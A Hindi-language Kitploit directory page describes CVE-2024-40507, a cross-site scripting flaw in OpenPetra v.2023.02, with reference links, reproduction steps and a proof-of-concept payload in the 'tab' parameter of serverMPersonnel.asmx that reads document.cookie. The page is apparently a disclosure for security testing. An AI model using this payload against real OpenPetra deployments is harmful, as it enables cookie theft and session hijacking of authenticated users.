Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-40507 — OpenPetra v.2023.02 CVE-2024-40507 का उपयोग करें | Kitploit
उपकरण/GitHubGitHub/jansen-c-moreira/cve-2024-40507
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubjansen-c-moreira/cve-2024-40507

CVE-2024-40507

OpenPetra v.2023.02 CVE-2024-40507 का उपयोग करें

रिपॉजिटरी देखें
12 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-40507

क्रॉस साइट स्क्रिप्टिंग भेद्यता openPetra v.2023.02 में serverMPersonnel.asmx फ़ंक्शन के माध्यम से।

विवरण: एक अप्रमाणित उपयोगकर्ता, openPetra v.2023.02 में serverMPersonnel.asmx फ़ंक्शन के माध्यम से XSS का शोषण करके प्रमाणित उपयोगकर्ता से कुकीज़ चुरा सकता है।

संवेदनशील उत्पाद संस्करण: openPetra v.2023.02
CVE लेखक: Jansen Moreira दिनांक: 13/07/2024
CVE: CVE-2024-40507
CVE लिंक: https://www.cve.org/CVERecord?id=CVE-2024-40507
NVD लिंक: https://nvd.nist.gov/vuln/detail/CVE-2024-40507
Tenable लिंक: https://www.tenable.com/cve/CVE-2024-40507
पुष्टि तिथि: 13/07/2024
परीक्षित: Linux पर

पुनरुत्पादन के चरण:

1- होम पेज तक पहुँचें
2- निम्नलिखित पथ का उपयोग करें और tab पैरामीटर में xss पेलोड जोड़ें। उदा.: http://target.com/api/serverMPersonnel.asmx?bnd=TMHospitalityWebServiceSoap&op=THospitalityWebConnector_Dummy&page=op&tab=x" onmouseover=alert(document.cookie) x=" 3- XSS को ट्रिगर करने के लिए बाएँ इंडेक्स आइटम पर माउस घुमाएँ


पेलोड्स:
tab: x" onmouseover=alert(document.cookie) x="

खोजकर्ता/श्रेय: Jansen Moreira

टूल डाउनलोड करें